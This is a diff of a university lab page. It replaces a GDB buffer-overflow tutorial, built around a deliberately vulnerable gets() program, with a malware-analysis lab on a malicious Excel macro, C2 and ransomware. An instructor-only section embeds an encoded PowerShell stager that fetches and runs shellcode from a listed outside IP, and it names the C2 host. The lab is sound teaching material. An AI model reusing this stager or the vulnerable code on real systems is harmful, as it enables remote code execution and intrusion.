Show page

Differences

This shows you the differences between two versions of the page.

--- isc:labs:06 [2023/11/14 21:09]
alexandru.ghita2611 [Exercises]
+++ isc:labs:06 [2024/11/11 14:43] (current)
vlad_iulius.nastase
@@ Line 1: / Line 1: @@
-===== Lab 06 - Application Security =====
+====== Lab 06 - Malware ======
-===== Resources =====
+<ifauth @isc>
+<note warning>
+**Ghid Command and Control**
-   *[[https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/|Buffer overflow explained]]
+[[https://docs.google.com/document/d/1sPfDPA6IvklVLTsZMk6FHv_vrWzu94E3qw-B3eWwSnw/edit?usp=sharing]]
-   *[[https://dhavalkapil.com/blogs/Shellcode-Injection/|Shellcode explained]]
-===== Setup =====
+[[https://outline.vladn.st/s/fcb3a6a5-da87-40a7-872a-39ad4a9aff43]]
-  * Open a lab VM instance on [[https://cloud.grid.pub.ro|OpenStack]], image: **ISC 2023 rev 1**, flavor: **m1.medium**.
+</note>
+</ifauth>
-  * Install the 32-bit **libc** and **gcc-multilib** packages:
+===== Setup =====
-<code>
+For this lab we will use the provided Windows VM. Please [[https://repository.grid.pub.ro/cs/isc/ISC%20Malware%20Lab%20VM.zip|download it from here]] in advance (~12GB archived; **you will need ~30-40GB of free storage on your computer**).
-sudo apt install libc6-dev-i386 gcc-multilib
+The VM is compatible with VMWare (Workstation and Player) >16. You can [[https://softwareupdate.vmware.com/cds/vmw-desktop/|download VMWare here]]. We recommend Workstation 17.
-</code>
+<note warning>
+All exercises will be done inside the Windows VM. **DO NOT** copy the provided files outside of the VM. Even if it is "didactic malware", written by us, it can actually be damaging to your computer.
+</note>
-  * Install the PwnDbg plugin:
+<note>
+Every tool you need is already installed on the VM we provided. If it’s not on the taskbar, you can find it on your Desktop, in the folder named ''%%Tools%%''.
+</note>
-<code>
+If needed, we will also use [[https://cloud.grid.pub.ro/|Openstack]] (limited capacity). Use the ''%%isc_prj%%'' project and start a VM with the following specifications:
+  * Source: ''%%ISC Malware Lab%%''
+  * Flavor: ''%%m1.isc_malware_lab%%''
+You don't need to specify an SSH key, we will be using the browser console to interact with the virtual machine.
-git clone https://github.com/pwndbg/pwndbg
+===== 00. Infection vector =====
-cd pwndbg
-./setup.sh
-</code>
+You are Gigel, an accountant at some lifeless notary firm. One day you receive an email with an attached Excel from //¿̶̦̞̗́͗̕y̸̳̹̗̆̏̍ǫ̵̭̞́͗͘ṷ̵̝͋̽r̸̢̪̈́ ̵͈̪̥̀̈́̓ḃ̶͇̬͑o̷͙̰̊͜š̷̱͈̐s̴͔͙̿?̵̤̽͆̕// telling you it’s some important financial data that has to be submitted until the end of the day to the authorities. Have you missed something? But you’re a good accountant, how did this happen? It’s probably something the bossman doesn’t really understand and is panicked for no reason, so you decide to open the attachment. You are filled with an extreme boredom and just want to get this stuff done and go back to scrolling Reddit, so you ignore any and all pop-ups, allow everything (despite the constant nagging of those pesky IT guys).
-To check if everything is OK, run the command ''gdb'' with no arguments. The prompt should be similar to this:
+**The attachment is on your Desktop. Go ahead, open it. What could go wrong?**
-<code>
+===== 01. Office Macros =====
-➜ gdb
-GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
-...
-pwndbg>
-</code>
-Enter ''q'' to exit GDB. We are using PwnDbg instead of the classic GDB because it is much more user friendly. Hope you'll like it ;)
-===== Overview =====
-{{http://i.imgur.com/mK1nsNl.png}}
-<note tip>
-This representation of the stack is valid for 32 bit programs. The calling convention is to save the parameters on the stack.
-To find out what's different for a 64 bit program check this [[https://www.systutorials.com/x86-64-calling-convention-by-gcc/|website]].
+<note important>
+You are now infected.
 </note>
-A buffer overflow occurs when data written to a buffer overruns its boundary and overwrites adjacent memory locations, due to insufficient bounds checking.
+One of the most common infection vectors is phishing and social engineering, which relies on the user simply opening a malicious binary. In our case, simply opening that Excel document got you infected. You might not see anything suspicious happening for now, so keep reading.
-===== GDB tutorial =====
+==== Online sandboxes ====
-==== PwnDbg ====
+While the VM we provided has some included tools for analysis, you probably don’t know where to get started. We recommend trying one of the available online sandboxes available.
-==== Loading a program ====
+  * [[https://www.virustotal.com/gui/home/upload|VirusTotal]]
+  * [[https://www.hybrid-analysis.com/|Hybrid Analysis]]
+  * [[https://app.any.run/|ANY.RUN]]
-In order to start debugging using GDB, you need to specify the program to be inspected. There are two options for doing this:
+The sandboxes mentioned above will take the documents you upload, run them (just like you did), but they also run some static analysis and monitor a few other things:
-  * When launching GDB:
+  * process execution, including any child processes
+  * network activity
+  * static analysis for suspicious signatures
+    * Encoding detection
+    * Binary packing detection
+    * YARA Rules (a format to specify signatures for malware)
-<code>
+Pick one sandbox and submit the Excel document. See what info you can gather from the results.
-➜ gdb buggy
-</code>
-  * After launching GDB:
-<code>
-➜ gdb
-...
-pwndbg> file buggy
-Reading symbols from buggy...
-</code>
-Once the debugging symbols from the executable were loaded, you can start executing your program using the ''run'' command.
-<code>
-pwndbg> run
-</code>
+<spoiler Hint 1>
 <note tip>
+Look at the processes that are executed, does anything look suspicious?
-You do not need the specify the full command, GDB can fill in the rest of a word in a command for you, if there is only one possibility.
-E.g.: ''r'', ''ru'' and ''run'' are equivalent; ''c'', ''co'', ''continue'' are equivalent.
 </note>
+</spoiler>
-In order to specify arguments for the debugged program, you can either:
+<spoiler Hint 2>
-  * Specify them prior to starting the program:
-<code>
-pwndbg> set args a b
-</code>
-  * Specify them when starting the program:
-<code>
-pwndbg> run a b
-</code>
 <note tip>
+What about network connections?
-You do not need to specify the arguments each time:
-''run'' with no arguments uses the same arguments used by the previous ''run'', or those set by the ''set args'' command.
 </note>
+</spoiler>
-==== Breakpoints ====
+==== Visual Basic macros ====
-Breakpoints represent places in your program where the execution should be stopped.
+From sandbox results, you can probably observe some references to a Powershell process being started by Excel. Powershell is a shell, just like ''%%bash%%'' and is (at least from Windows 10/11) the default system shell on Windows. So, why would Excel, a spreadsheet program, need to open a shell prompt and run commands? In usual operation, it doesn’t, but for more advanced use cases, Excel (and some other Office products) allow you to write “macros”, which are functions written in the Visual Basic programming language.
-They are added using the [[https://visualgdb.com/gdbreference/commands/break|break]] command. Here are the most common usages:
-  * ''break function'' - Set a breakpoint at function entry. When using source languages that permit overloading of symbols, such as C++, function may refer to more than one possible place to break.
+You can read more about this
-  * ''break linenum'' - Set a breakpoint at line ''linenum'' in the current source file. The current source file is the last file whose source text was printed. The breakpoint will stop your program just before it executes any of the code on that line.
+  * https://support.microsoft.com/en-us/office/automatically-run-a-macro-when-opening-a-workbook-1e55959b-e077-4c88-a696-c3017600db44
+  * https://learn.microsoft.com/en-us/office/vba/library-reference/concepts/getting-started-with-vba-in-office
-  * ''break filename:linenum'' - Set a breakpoint at line ''linenum'' in source file ''filename''.
-  * ''break filename:func'' - Set a breakpoint at entry of the function ''func'' found in file ''filename''. Specifying a file name as well as a function name is superfluous except when multiple files contain similarly named functions.
+Since our macro got executed when we opened the document, we need a way to see it without running Excel. We can use the ''%%oletools%%'' Python package for this.
-  * ''break *addr'' - Set a breakpoint at address ''addr''. You can use this to set breakpoints in parts of your program which do not have debugging information or source files.
-You can see an overview of the current breakpoints using the ''info break'' command.
-<code>
-pwndbg> info b
-Num     Type           Disp Enb Address    What
-       breakpoint     keep y   0x000011de in wanted at buggy.c:6
-       breakpoint     keep y   0x00001229 in copy at buggy.c:16
-       breakpoint     keep y   0x00001281 in main at buggy.c:22
-</code>
-<note tip>
-Short for ''info break'' is ''i b''.
+<note>
+**FLAG 1 [30p]**
+Read the documentation for ''%%oletools%%'', available on [[https://github.com/decalage2/oletools|Github]] and extract the macro. ''%%oletools%%'' is already installed in your virtual machine.
 </note>
-In order to remove breakpoints, you can use the ''clear'' or the ''delete'' (''d'') command.
+<spoiler Hint>
-With the [[https://visualgdb.com/gdbreference/commands/clear|clear]] command you can delete breakpoints according to where they are in your program.
+''%%oletools%%'' is the package name. Check the documentation for the name of the tool that seems to do what you want.
-With the [[https://visualgdb.com/gdbreference/commands/delete|delete]] command you can delete individual breakpoints by specifying their breakpoint numbers.
+</spoiler>
-<code>
+Observe the output you got from ''%%oletools%%''. It also provides some insight into what the macro is doing, including the reason it automatically executes when the Excel workbook is opened.
-pwndbg> delete 2
+We recommend using CyberChef to decode the powershell payload that is executed. Some useful CyberChef functions you might want to use (not completely necessary to use all of them): ''%%Find/Replace%%'', ''%%Drop Bytes%%'', some decoding function (figure out the encoding, or let CyberChef help you), ''%%Decode text%%''.
-pwndbg> clear buggy.c:6
-Deleted breakpoint 1
-</code>
+<spoiler Hint>
+Windows uses UTF-16 Little Endian text encoding by default.
+</spoiler>
-Once you want to resume execution, you can use the ''continue'' (''c'') command.
-<code>
+In the end you get a weird looking Powershell script. You don’t need to worry about understanding it, but if you want to read more, you can [[https://dominicbreuker.com/post/learning_sliver_c2_06_stagers/#powershell-stager|do it here]]. Some useful information you can get from this Powershell script:
-pwndbg> continue
+  * the flag for this exercise
-Continuing.
+  * the address for the attacker’s infrastructure (which you also observed in the sandbox results)
-...
-[Inferior 1 (process 11131) exited normally]
-</code>
-==== Start ====
-The ''start'' command is very similar to ''run'', but instead of running the program until it ends (or until it crashes), it sets a breakpoint at the beginning of the main function.
+<ifauth @isc>
+<hidden>
 <code>
+olevba 'IMPORTANT FIANNCIAL DATA.xls'
-              if (argc == 1) {
-LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
-─────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────
-*EAX  0xffffd880 ◂— 0x2
-*EBX  0x56558fcc (_GLOBAL_OFFSET_TABLE_) ◂— 0x3ed4
-*ECX  0xffffd880 ◂— 0x2
-*EDX  0xffffd8a0 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
-*EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
-*ESI  0xffffd934 —▸ 0xffffdabd ◂— '/home/student/appsec/buggy'
-*EBP  0xffffd868 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 —▸ 0x56555000 ◂— 0x464c457f
-*ESP  0xffffd850 —▸ 0xffffd890 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
-*EIP  0x56556281 (main+31) ◂— cmp dword ptr [eax], 1
-───────────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────────────
- ► 0x56556281 <main+31>    cmp    dword ptr [eax], 1
-x56556284 <main+34>    jne    main+61                    <main+61>
-    ↓
-x5655629f <main+61>    mov    dword ptr [ebp - 0xc], 0x796568
-x565562a6 <main+68>    mov    eax, dword ptr [eax + 4]
-x565562a9 <main+71>    add    eax, 4
-x565562ac <main+74>    mov    eax, dword ptr [eax]
-x565562ae <main+76>    sub    esp, 4
-x565562b1 <main+79>    push   eax
-x565562b2 <main+80>    lea    eax, [ebp - 0xc]
-x565562b5 <main+83>    push   eax
-x565562b6 <main+84>    lea    eax, [ebx - 0x1f6e]
-────────────────────────────────────────────[ SOURCE (CODE) ]────────────────────────────────────────────
-In file: /home/student/appsec/buggy.c
-         gets(name);
-         printf("bye\n");
-}
-int main(int argc, char **argv) {
- ► 22         if (argc == 1) {
-                 puts("Usage: %s <name>\n");
-                 return 1;
-          }
-         char buf[] = "hey";
-────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
-:0000│ esp 0xffffd850 —▸ 0xffffd890 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
-:0004│-014 0xffffd854 —▸ 0xf7fbe66c —▸ 0xf7ffdba0 —▸ 0xf7fbe780 —▸ 0xf7ffda40 ◂— ...
-:0008│-010 0xffffd858 —▸ 0xf7fbeb20 —▸ 0xf7d99cc6 ◂— 'GLIBC_PRIVATE'
-:000c│-00c 0xffffd85c ◂— 0x1
-:0010│-008 0xffffd860 —▸ 0xffffd880 ◂— 0x2
-:0014│-004 0xffffd864 —▸ 0xf7fa9000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
-:0018│ ebp 0xffffd868 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 —▸ 0x56555000 ◂— 0x464c457f
-:001c│+004 0xffffd86c —▸ 0xf7da0519 (__libc_start_call_main+121) ◂— add esp, 0x10
-──────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────
- ► 0 0x56556281 main+31
-0xf7da0519 __libc_start_call_main+121
-0xf7da05f3 __libc_start_main+147
-0x565560cb _start+43
-─────────────────────────────────────────────────────────────────────────────────────────────────────────
 </code>
-Let's take a look at the previous output that PwnDbg prints. You can see it is seprated into 5 sections: REGISTERS, DISASM, SOURCE, STACK and TRACE.
+[[https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%5B%22_%26%20%5C%5Cr%5C%5Cn%5D'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=SkFCWEFHa0FiZ0F6QURJQUlBQTlBQ0FBUUFBaUFBMEFDZ0IxQUhNQWFRQnVBR2NBSUFCVEFIa0Fjd0IwQUdVQWJRQTdBQTBBQ2dCMUFITUFhUUJ1QUdjQUlBQlRBSGtBY3dCMEFHVUFiUUF1QUZJQWRRQnVBSFFBYVFCdEFHVUFMZ0JKQUc0QWRBQmxBSElBYndCd0FGTUFaUUJ5QUhZQWFRQmpBR1VBY3dBN0FBMEFDZ0J3QUhVQVlnQnNBR2tBWXdBZ0FHTUFiQUJoQUhNQWN3QWdBRmNBYVFCdUFETUFNZ0FnQUhzQURRQUtBRnNBUkFCc0FHd0FTUSIgXw0KICAgICYgIkJ0QUhBQWJ3QnlBSFFBS0FBaUFHc0FaUUJ5QUc0QVpRQnNBRE1BTWdBaUFDa0FYUUFOQUFvQWNBQjFBR0lBYkFCcEFHTUFJQUJ6QUhRQVlRQjBBR2tBWXdBZ0FHVUFlQUIwQUdVQWNnQnVBQ0FBU1FCdUFIUUFVQUIwQUhJQUlBQldBR2tBY2dCMEFIVUFZUUJzQUVFQWJBQnNBRzhBWXdBb0FFa0FiZ0IwQUZBQWRBQnlBQ0FBYkFCd0FFRUFaQUJrQUhJQVpRQnpBSE1BTEFBTkFBb0FJQUFnQUNBQUlBQjFBR2tBYmdCMEFDQUFaQUIzQUZNQWFRQjYiIF8NCiAgICAmICJBR1VBTEFBTkFBb0FJQUFnQUNBQUlBQjFBR2tBYmdCMEFDQUFaZ0JzQUVFQWJBQnNBRzhBWXdCaEFIUUFhUUJ2QUc0QVZBQjVBSEFBWlFBc0FBMEFDZ0FnQUNBQUlBQWdBSFVBYVFCdUFIUUFJQUJtQUd3QVVBQnlBRzhBZEFCbEFHTUFkQUFwQURzQURRQUtBRnNBUkFCc0FHd0FTUUJ0QUhBQWJ3QnlBSFFBS0FBaUFHc0FaUUJ5QUc0QVpRQnNBRE1BTWdBaUFDd0FJQUJEQUdnQVlRQnlBRk1BWlFCMEFEMEFRd0JvQUdFQWNnQlRBR1VBZEFBdUFFIiBfDQogICAgJiAiRUFiZ0J6QUdrQUtRQmRBQTBBQ2dCd0FIVUFZZ0JzQUdrQVl3QWdBSE1BZEFCaEFIUUFhUUJqQUNBQVpRQjRBSFFBWlFCeUFHNEFJQUJKQUc0QWRBQlFBSFFBY2dBZ0FFTUFjZ0JsQUdFQWRBQmxBRlFBYUFCeUFHVUFZUUJrQUNnQURRQUtBQ0FBSUFBZ0FDQUFTUUJ1QUhRQVVBQjBBSElBSUFCc0FIQUFWQUJvQUhJQVpRQmhBR1FBUVFCMEFIUUFjZ0JwQUdJQWRRQjBBR1VBY3dBc0FBMEFDZ0FnQUNBQUlBQWdBSFVBYVFCdUFIUUFJQUJrQUhjQSIgXw0KICAgICYgIlV3QjBBR0VBWXdCckFGTUFhUUI2QUdVQUxBQU5BQW9BSUFBZ0FDQUFJQUJKQUc0QWRBQlFBSFFBY2dBZ0FHd0FjQUJUQUhRQVlRQnlBSFFBUVFCa0FHUUFjZ0JsQUhNQWN3QXNBQTBBQ2dBZ0FDQUFJQUFnQUVrQWJnQjBBRkFBZEFCeUFDQUFiQUJ3QUZBQVlRQnlBR0VBYlFCbEFIUUFaUUJ5QUN3QURRQUtBQ0FBSUFBZ0FDQUFkUUJwQUc0QWRBQWdBR1FBZHdCREFISUFaUUJoQUhRQWFRQnZBRzRBUmdCc0FHRUFad0J6QUN3QURRQUtBQ0FBSUEiIF8NCiAgICAmICJBZ0FDQUFTUUJ1QUhRQVVBQjBBSElBSUFCc0FIQUFWQUJvQUhJQVpRQmhBR1FBU1FCa0FDa0FPd0FOQUFvQVd3QkVBR3dBYkFCSkFHMEFjQUJ2QUhJQWRBQW9BQ0lBYXdCbEFISUFiZ0JsQUd3QU13QXlBQzRBWkFCc0FHd0FJZ0FzQUNBQVV3QmxBSFFBVEFCaEFITUFkQUJGQUhJQWNnQnZBSElBUFFCMEFISUFkUUJsQUNrQVhRQU5BQW9BY0FCMUFHSUFiQUJwQUdNQUlBQnpBSFFBWVFCMEFHa0FZd0FnQUdVQWVBQjBBR1VBY2dCdUFDQUFWUUJKIiBfDQogICAgJiAiQUc0QWRBQXpBRElBSUFCWEFHRUFhUUIwQUVZQWJ3QnlBRk1BYVFCdUFHY0FiQUJsQUU4QVlnQnFBR1VBWXdCMEFDZ0FEUUFLQUNBQUlBQWdBQ0FBU1FCdUFIUUFVQUIwQUhJQUlBQm9BRWdBWVFCdUFHUUFiQUJsQUN3QURRQUtBQ0FBSUFBZ0FDQUFWUUJKQUc0QWRBQXpBRElBSUFCa0FIY0FUUUJwQUd3QWJBQnBBSE1BWlFCakFHOEFiZ0JrQUhNQUtRQTdBQTBBQ2dCOUFBMEFDZ0FpQUVBQURRQUtBRUVBWkFCa0FDMEFWQUI1QUhBQVpRQWdBQyIgXw0KICAgICYgIlFBVndCcEFHNEFNd0F5QUEwQUNnQU5BQW9BSXdBZ0FFa0FVd0JEQUhzQWFBQmxBR01BWVFCeUFHMEFaUUJ1QUY4QWR3QmhBSE1BWHdCb0FHVUFjZ0JsQUgwQURRQUtBRnNBVXdCNUFITUFkQUJsQUcwQUxnQk9BR1VBZEFBdUFGTUFaUUJ5QUhZQWFRQmpBR1VBVUFCdkFHa0FiZ0IwQUUwQVlRQnVBR0VBWndCbEFISUFYUUE2QURvQVV3QmxBSElBZGdCbEFISUFRd0JsQUhJQWRBQnBBR1lBYVFCakFHRUFkQUJsQUZZQVlRQnNBR2tBWkFCaEFIUUEiIF8NCiAgICAmICJhUUJ2QUc0QVF3QmhBR3dBYkFCaUFHRUFZd0JyQUNBQVBRQWdBSHNBSkFCMEFISUFkUUJsQUgwQUlBQTdBQTBBQ2dBa0FITUFhQUJsQUd3QWJBQmpBRzhBWkFCbEFDQUFQUUFnQUNnQVRnQmxBSGNBTFFCUEFHSUFhZ0JsQUdNQWRBQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVRnQmxBSFFBTGdCWEFHVUFZZ0JEQUV3QWFRQmxBRzRBZEFBcEFDNEFSQUJ2QUhjQWJnQnNBRzhBWVFCa0FFUUFZUUIwQUdFQUtBQWlBR2dBZEFCMEFIQUFjd0E2QUM4QUx3IiBfDQogICAgJiAiQXhBRGtBTkFBdUFERUFPQUF5QUM0QU1RQTJBRFFBTGdBeEFEUUFPUUE2QURnQU1BQTRBREFBTHdCbUFHOEFiZ0IwQUdFQWR3QmxBSE1BYndCdEFHVUFMZ0IzQUc4QVpnQm1BQ0lBS1FBTkFBb0FhUUJtQUNBQUtBQWtBSE1BYUFCbEFHd0FiQUJqQUc4QVpBQmxBQ0FBTFFCbEFIRUFJQUFrQUc0QWRRQnNBR3dBS1FBZ0FIc0FSUUI0QUdrQWRBQjlBRHNBRFFBS0FDUUFjd0JwQUhvQVpRQWdBRDBBSUFBa0FITUFhQUJsQUd3QWJBQmpBRzhBWkFCbCIgXw0KICAgICYgIkFDNEFUQUJsQUc0QVp3QjBBR2dBRFFBS0FBMEFDZ0JiQUVrQWJnQjBBRkFBZEFCeUFGMEFKQUJoQUdRQVpBQnlBQ0FBUFFBZ0FGc0FWd0JwQUc0QU13QXlBRjBBT2dBNkFGWUFhUUJ5QUhRQWRRQmhBR3dBUVFCc0FHd0Fid0JqQUNnQU1BQXNBQ1FBY3dCcEFIb0FaUUFzQURBQWVBQXhBREFBTUFBd0FDd0FNQUI0QURRQU1BQXBBRHNBRFFBS0FGc0FVd0I1QUhNQWRBQmxBRzBBTGdCU0FIVUFiZ0IwQUdrQWJRQmxBQzRBU1FCdUFIUUFaUUJ5QUciIF8NCiAgICAmICI4QWNBQlRBR1VBY2dCMkFHa0FZd0JsQUhNQUxnQk5BR0VBY2dCekFHZ0FZUUJzQUYwQU9nQTZBRU1BYndCd0FIa0FLQUFrQUhNQWFBQmxBR3dBYkFCakFHOEFaQUJsQUN3QUlBQXdBQ3dBSUFBa0FHRUFaQUJrQUhJQUxBQWdBQ1FBY3dCcEFIb0FaUUFwQUEwQUNnQWtBSFFBYUFCaEFHNEFaQUJzQUdVQVBRQmJBRmNBYVFCdUFETUFNZ0JkQURvQU9nQkRBSElBWlFCaEFIUUFaUUJVQUdnQWNnQmxBR0VBWkFBb0FEQUFMQUF3QUN3QUpBQmhBR1FBIiBfDQogICAgJiAiWkFCeUFDd0FNQUFzQURBQUxBQXdBQ2tBT3dBTkFBb0FXd0JYQUdrQWJnQXpBRElBWFFBNkFEb0FWd0JoQUdrQWRBQkdBRzhBY2dCVEFHa0FiZ0JuQUd3QVpRQlBBR0lBYWdCbEFHTUFkQUFvQUNRQWRBQm9BR0VBYmdCa0FHd0FaUUFzQUNBQVd3QjFBR2tBYmdCMEFETUFNZ0JkQUNJQU1BQjRBRVlBUmdCR0FFWUFSZ0JHQUVZQVJnQWlBQ2tBIg&ieol=CRLF&oeol=CRLF|CyberChef recipe]]
-With the original GDB you would have to manually print registers, disassemble code and inspect the stack. Thanks, God, for PwnDbg!
+</hidden>
+</ifauth>
-==== Step ====
+===== 02. Command and Control (C2 / C&C) =====
-There might be situations when you only want to execute one line of source code, or one machine instruction from your program.
+What you uncovered is a command and control stager. Command and control attacks are a type of attack where a program is used to gain control of the infected computers. This requires a connection to a command and control server, where attackers can see the infected devices and send command to them. Some functionality of command and control binaries:
-This action is called [[https://sourceware.org/gdb/onlinedocs/gdb/Continuing-and-Stepping.html|step]] and can be categorized as follows:
-  * ''step'' or ''s'' (step into) - Continue running your program until control reaches a different source line, then stop it and return control to GDB. If the line you are stepping over represents a function call, this command will step inside it.
+  * process control (spawning, killing and dumping processes)
+  * information gathering (user, network, computer)
+  * file transfer
+  * covert persistence (via process injection, beacons, backdoored binaries)
+  * screenshot taking
-  * ''next'' or ''n'' (step over) - Continue to the next source line in the current stack frame. This is similar to step, but function calls that appear within the line of code are executed without stopping.
+<note>
+**FLAG 2 [10p]**
-There are also equivalent functions for the machine instructions: ''stepi'' and ''nexti''.
+Attackers might neglect the security of their own infrastructure. Check if this is the case. Maybe try some other known ports? (''%%nmap%%'' is installed, but you probably don't need it)
+</note>
-If you stepped into a function and you want to continue the execution until the function returns, you can use the ''finish'' or ''f'' (step out) command.
-==== Printing variables and memory ====
+The C2 stager we used is a pretty simple one. If you want to read more about C2 capabilities you can read this [[https://dominicbreuker.com/post/learning_sliver_c2_01_installation/|awesome blog post series]] about Sliver.
-No need to manually print registers anymore, but you still might need to print the content of a variable:
+<ifauth @isc>
+<hidden>
+[[http://194.182.164.149/]]
+</hidden>
+</ifauth>
-<code>
+===== 03. Ransomware =====
-pwndbg> print argc
+<note warning>
-$1 = 2
+Ask your lab assistant to use the C2 server to send some actual malware your way.
-</code>
+As a backup, the ransomware binary can also be found in ''%%C:\Users\<your_user>\Documents\backup%%''
+</note>
-The ''print'' or ''p'' command allows you to specify the format of the output like this (you can find a full list of possible format specifiers [[https://ftp.gnu.org/old-gnu/Manuals/gdb/html_chapter/gdb_9.html#SEC55|here]]):
+**As before, go ahead and run it, see what happens.**
-<code>
-pwndbg> p/x $esp
+Ransomware is a type of malware that encrypts documents and files on your computer, demanding a ransom to obtain a decryption key or program. In our case, the entire content of the ''%%very_secret_documents%%'' folder on your Desktop has been encrypted.
-$1 = 0xffffd860
-pwndbg> x/2x 0xffffd860
+But is there any way you can recover those files? Since we presume the attacker has a decryption key for your files, that means the ransomware must communicate in some way. Try and use Wireshark to see if any traffic seems out of the ordinary.
-xffffd860:     0xffffd8a0      0xf7fbe66c
-pwndbg> p/d $esp
-$2 = -10144
-pwndbg> p/s buf
+<note>
-$3 = "hey"
+**FLAG 3 [20p]**
-pwndbg> p/x buf
+Try and find the decryption key.
-$4 = {0x68, 0x65, 0x79, 0x0}
-</code>
-==== Reading and modifying memory ====
-You can use the command ''x'' (for **examine**) to examine memory in several formats, independently of your program's data types.
-<code>
-pwndbg> x/nfu addr
-</code>
-''n'', ''f'', and ''u'' are all optional parameters that specify how much memory to display and how to format it.
-''addr'' is an expression giving the address where you want to start displaying memory.
-  * **n** - The repeat count is a decimal integer; the default is 1. It specifies how much memory (counting by units **u**) to display.
-  * **f** - The display format is one of the formats used by print.
-  * **u** - The unit size is any of ''b'' (bytes), ''h'' (halfwords), ''w'' (words)
-E.g.: Print 10 words in hexadecimal format, starting from the address of the current stack pointer.
-<code>
-pwndbg> x/10ww $esp
-xffffd850:     0xffffd890      0xf7fbe66c      0xf7fbeb20      0x00796568
-xffffd860:     0xffffd880      0xf7fa9000      0xf7ffd020      0xf7da0519
-xffffd870:     0xffffdabd      0x00000070
-</code>
-In order to change the value of a variable or of a specific memory area, you can use the ''set'' command:
-<code>
-pwndbg> set g = 4
-pwndbg> set {int}0xffffd890 = 4
-</code>
-==== Stack info ====
-A backtrace is a summary of how your program got where it is. It shows one line per frame, for many frames, starting with the currently executing frame (frame zero), followed by its caller (frame one), and on up the stack.
-''backtrace'' or ''bt'' - Print a backtrace of the entire stack: one line per frame for all frames in the stack.
-E.g.:
-<code>
-pwndbg> backtrace
-#0  copy () at buggy.c:16
-#1  0x565562ca in main (argc=2, argv=0xffffd934) at buggy.c:29
-#2  0xf7da0519 in ?? ()
-Backtrace stopped: previous frame inner to this frame (corrupt stack?)
-</code>
-It is also possible to move up or down the stack using the following commands:
-  * ''up n'' - Move **n** frames up the stack. For positive numbers **n**, this advances toward the outermost frame, to higher frame numbers, to frames that have existed longer. **n** defaults to one.
-  * ''down n'' - Move **n** frames down the stack. For positive numbers **n**, this advances toward the innermost frame, to lower frame numbers, to frames that were created more recently. **n** defaults to one.
-Another useful command for printing information related to the current stack frame is ''info frame''. This command prints a verbose description of the selected stack frame, including:
-  * the address of the frame
-  * the address of the next frame down (called by this frame)
-  * the address of the next frame up (caller of this frame)
-  * the language in which the source code corresponding to this frame is written
-  * the address of the frame's arguments
-  * the address of the frame's local variables
-  * the program counter saved in it (the address of execution in the caller frame)
-  * which registers were saved in the frame
-==== Exercises ====
-For exercises 02-04 do not quit GDB.
-=== 01. [5p] Our test program ===
-Compile the following code:
-''buggy.c''
-<code>
-#include <stdio.h>
-#include <unistd.h>
-#include <stdlib.h>
-void wanted(int a) {
-	if (a == 0xcafebabe) {
-		puts("well done, you're cool!");
-	} else {
-		puts("at least you tried");
-	}
-}
-void copy() {
-	char name[12];
-	printf("what's ur last name?\n");
-	gets(name);
-	printf("bye\n");
-}
-int main(int argc, char **argv) {
-  if (argc == 1) {
-    puts("Usage: %s <name>\n");
-    return 1;
-  }
-	char buf[] = "hey";
-	printf("%s, %s\n", buf, argv[1]);
-	copy();
-  exit(0);
-}
-</code>
-Use this command:
-<code>
-gcc buggy.c -o buggy -fno-stack-protector -m32 -g
-</code>
-=== 02. [5p] Run, break, step ===
-Run the program using GDB, setting the argument ''Florin''.
-Set a breakpoint at the beginning of the ''main'' function.
-Continue execution until you hit the breakpoint.
-Try to reach the beginning of the ''copy'' function without setting another breakpoint.
-**Hint:** Use step over and step into.
-<solution -hidden>
-<code>
-➜ gdb buggy
-...
-pwndbg> set args Florin
-pwndbg> b main
-pwndbg> r
-Starting program: /home/student/appsec/buggy AAA
-...
-Breakpoint 1, main (argc=2, argv=0xffffd934) at buggy.c:22
-              if (argc == 1) {
-...
-pwndbg> n
-              char buf[] = "hey";
-...
-pwndbg> n
-              printf("%s, %s\n", buf, argv[1]);
-...
-pwndbg> n
-hey, Florin
-              copy();
-...
-pwndbg> s
-copy () at buggy.c:16
-              printf("what's ur last name?\n");
-</code>
-</solution>
-=== 03. [5p] Printing stuff ===
-Remove the existing breakpoint and set a new one at the beginning of the ''copy'' function.
-Run again the program and continue execution until you hit the breakpoint.
-Print the value and the address of ''name''. Print the value again after ''gets(name)'' is executed.
-<solution -hidden>
-<code>
-pwndbg> del 1
-pwndbg> b copy
-Breakpoint 2 at 0x1229: file buggy.c, line 16.
-pwndbg> run
-Starting program: /home/student/appsec/buggy AAA
-...
-hey, Florin
-Breakpoint 2, copy () at buggy.c:16
-              printf("what's ur last name?\n");
-...
-pwndbg> p name
-$1 = "\000\000\000\000\231j\335\367\302bUV"
-pwndbg> p &name
-$2 = (char (*)[12]) 0xffffd834
-pwndbg> n
-what's ur last name?
-              gets(name);
-...
-pwndbg> n
-parizer
-              printf("bye\n");
-...
-pwndbg> p name
-$3 = "parizer\000\302bUV"
-</code>
-</solution>
-=== 04. [5p] ASLR ===
-Start the execution and print the address of ''buf'' from the main function, and then repeat. What do you notice?
-Check from GDB if ASLR is enabled. What happens and how can you fix it?
-**Hint:** [[http://visualgdb.com/gdbreference/commands/set_disable-randomization]]
-<solution -hidden>
-<code>
-pwndbg> start
-              if (argc == 1) {
-...
-pwndbg> p &buf
-$4 = (char (*)[4]) 0xffffd86c
-pwndbg> start
-              if (argc == 1) {
-...
-pwndbg> p &buf
-$5 = (char (*)[4]) 0xffffd86c
